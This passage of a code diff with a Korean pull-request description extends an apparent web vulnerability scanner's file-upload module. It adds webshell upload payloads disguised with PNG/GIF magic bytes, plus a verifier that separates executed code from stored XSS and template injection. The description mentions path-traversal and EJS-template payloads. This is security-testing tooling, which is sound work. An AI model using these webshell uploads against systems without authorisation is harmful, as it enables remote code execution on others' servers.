+            verify_mode=VERIFY_RCE,
+            marker=php_marker,
+        )
+    )
+    payloads.append(
+        FilePayload(
+            random_filename("php", "receipt"),
+            png_webshell,
+            "image/png",
+            "Magic_Byte_PNG",
+            verify_mode=VERIFY_RCE,
+            marker=php_marker,
+        )
+    )
 
     for ext in config.get("magic_byte_extensions", []):
         ext_text = str(ext).strip()
         if not ext_text:
             continue
-        filename = get_random_filename(ext_text, "image")
-        payloads.append(FilePayload(filename, gif_webshell, "image/gif", f"Magic_Byte_GIF_{ext_text}"))
+        payloads.append(
+            FilePayload(
+                random_filename(ext_text, "image"),
+                gif_webshell,
+                "image/gif",
+                f"Magic_Byte_GIF_{ext_text}",
+                verify_mode=VERIFY_RCE,
+                marker=php_marker,
+            )
+        )
 
     for classic in config.get("classic_payloads", []):
         if not isinstance(classic, dict):
             continue
-        ext = str(classic.get("extension", "")).strip()
-        if not ext:
+        try:
+            payloads.append(_payload_from_classic(classic, base_names=base_names, markers=markers))
+        except ValueError:
             continue
-        prefix = str(classic.get("prefix", "")).strip()
-        content_type = str(classic.get("content_type", "application/x-php")).strip()
-        attack_type = str(classic.get("attack_type", f"Classic_{ext}")).strip()
-        payloads.append(
-            FilePayload(
-                get_random_filename(ext, prefix),
-                base_webshell,
-                content_type,
-                attack_type,
-            )
-        )
 
     return payloads
 

--- a/modules/file_upload/verifier.py
+++ b/modules/file_upload/verifier.py
@@ -1,18 +1,38 @@
 from __future__ import annotations
 
 import re
+from dataclasses import dataclass
 from html import unescape
 from html.parser import HTMLParser
-from urllib.parse import urljoin
+from typing import TYPE_CHECKING
+from urllib.parse import urljoin, urlsplit
 
-EXECUTION_MARKER = "WAF_UPLOAD_VULN_DETECTED"
+from modules.file_upload.markers import (
+    DEFAULT_SHELL_TAGS_BY_MODE,
+    NODE_TEMPLATE_TAGS,
+    PHP_SHELL_TAGS,
+    RCE_PHP_MARKER,
+    VERIFY_RCE,
+    VERIFY_STATIC,
+    VERIFY_TEMPLATE,
+)
+
+if TYPE_CHECKING:
+    from modules.file_upload.payloads import FilePayload
+
+# Backward-compatible export used by module/tests.
+EXECUTION_MARKER = RCE_PHP_MARKER
+
+
+@dataclass(frozen=True, slots=True)
+class VerificationResult:
+    verified: bool
+    category: str
+    severity: str
+    evidences: list[str]
 
 
 class UploadPathExtractor(HTMLParser):
-    """
-    Lightweight HTML extractor for uploaded file paths.
-    """
-
     _CANDIDATE_ATTRS = ("href", "src", "action", "value", "data-url", "data-file")
 
     def __init__(self, filename: str) -> None:
@@ -41,25 +61,86 @@ class UploadPathExtractor(HTMLParser):
 
 
 def extract_dynamic_verify_urls(base_url: str, response_text: str, filename: str) -> list[str]:
-    extractor = UploadPathExtractor(filename=filename)
-    extractor.feed(response_text)
+    """Backward-compatible wrapper around path_discovery strategy 1."""
+    from modules.file_upload.path_discovery import extract_paths_from_text, merge_verify_urls
 
-    escaped_filename = re.escape(filename)
-    for match in re.findall(
-        rf"([^\s\"'<>]+{escaped_filename}[^\s\"'<>]*)",
-        response_text,
-        re.IGNORECASE,
-    ):
-        extractor.paths.add(unescape(match).strip().strip("'\""))
+    class _PayloadShim:
+        verify_paths: tuple[str, ...] = ()
+        verify_mode: str = ""
 
-    verify_urls: list[str] = []
-    for path in extractor.paths:
-        if not path:
-            continue
-        if path.startswith(("http://", "https://")):
-            verify_urls.append(path)
-            continue
-        normalized = path if path.startswith("/") else f"/{path.lstrip('./')}"
-        verify_urls.append(urljoin(base_url, normalized))
-    return verify_urls
+    paths = extract_paths_from_text(response_text, filename)
+    return merge_verify_urls(
+        base_url=base_url,
+        filename=filename,
+        discovered_paths=paths,
+        payload=_PayloadShim(),
+        include_fallback=False,
+    )
 
+
+def _body_contains_any(body: str, needles: tuple[str, ...]) -> bool:
+    lower = body.lower()
+    return any(needle.lower() in lower for needle in needles if needle)
+
+
+def _shell_tags_for_payload(payload: FilePayload) -> tuple[str, ...]:
+    if payload.shell_tags:
+        return payload.shell_tags
+    return DEFAULT_SHELL_TAGS_BY_MODE.get(payload.verify_mode, PHP_SHELL_TAGS)
+
+
+def verify_upload_response(body: str, payload: FilePayload) -> VerificationResult:
+    """
+    Active verification: distinguish executed code (RCE) vs static reflection (XSS).
+    """
+    evidences: list[str] = []
+    mode = (payload.verify_mode or VERIFY_RCE).lower()
+
+    if mode == VERIFY_STATIC:
+        probe = (payload.content_probe or payload.marker or "").strip()
+        if not probe:
+            return VerificationResult(False, "static", "high", evidences)
+        if probe not in body:
+            return VerificationResult(False, "stored_xss", "high", evidences)
+        evidences.append(f"[StaticServe] probe reflected: {probe[:80]}")
+        return VerificationResult(True, "stored_xss", "high", evidences)
+
+    if mode == VERIFY_TEMPLATE:
+        marker = payload.marker
+        if marker not in body:
+            return VerificationResult(False, "template_rce", "critical", evidences)
+        if _body_contains_any(body, _shell_tags_for_payload(payload) or NODE_TEMPLATE_TAGS):
+            return VerificationResult(False, "template_rce", "critical", evidences)
+        evidences.append(f"[TemplateRCE] marker rendered without template tags: {marker}")
+        return VerificationResult(True, "template_rce", "critical", evidences)
+
+    # VERIFY_RCE — marker must appear and interpreter tags must be stripped.
+    marker = payload.marker
+    if marker not in body:
+        return VerificationResult(False, "rce", "critical", evidences)
+    if _body_contains_any(body, _shell_tags_for_payload(payload)):
+        return VerificationResult(False, "rce", "critical", evidences)
+    evidences.append(f"[RCE] marker executed (shell tags absent): {marker}")
+    return VerificationResult(True, "rce", "critical", evidences)
+
+
+def build_verify_url_list(
+    *,
+    base_url: str,
+    upload_response_text: str,
+    payload: FilePayload,
+    surface_url: str = "",
+    include_fallback: bool = True,
+) -> list[str]:
+    """Sync URL list: upload response parsing + optional directory fallback."""
+    from modules.file_upload.path_discovery import extract_paths_from_text, merge_verify_urls
+
+    paths = extract_paths_from_text(upload_response_text, payload.filename)
+    return merge_verify_urls(
+        base_url=base_url,
+        filename=payload.filename,
+        discovered_paths=paths,
+        payload=payload,
+        surface_url=surface_url,
+        include_fallback=include_fallback,
+    )


### PR DESCRIPTION
## 📌 PR 목적 (What)
기존 PHP 환경에 국한되었던 파일 업로드 취약점 스캔 범위를 Express(Node.js) 및 범용 웹 서버 환경으로 대폭 확장
## 🛠️ 주요 변경 사항 (How)
- 단순 1차 업로드 응답 분석을 넘어, 게시판 목록에서 최신 게시글 상세 페이지로 진입해 파일 링크를 추출하는 DOM 파싱 추적 로직을 구현
- PHP 기반 RCE 페이로드 외에 SVG/HTML을 활용한 Stored XSS, ../../../ 등을 활용한 Path Traversal, EJS 템플릿 덮어쓰기 등 Node.js 환경에서 작동하는 Classic 페이로드를 추가
## 🧪 테스트 결과 (Testing & Verification)
<img width="822" height="556" alt="image" src="https://github.com/user-attachments/assets/bf4b7672-9557-4e99-b3c7-73d0f91abe74" />

## 💡 리뷰어 참고 사항
**@강제윤**
stored_xss에 있던 페이지 탐지 로직을 그대로 사용했습니다. 차후 동적으로 동작하도록 수정할 때 같이 수정이 필요합니다.
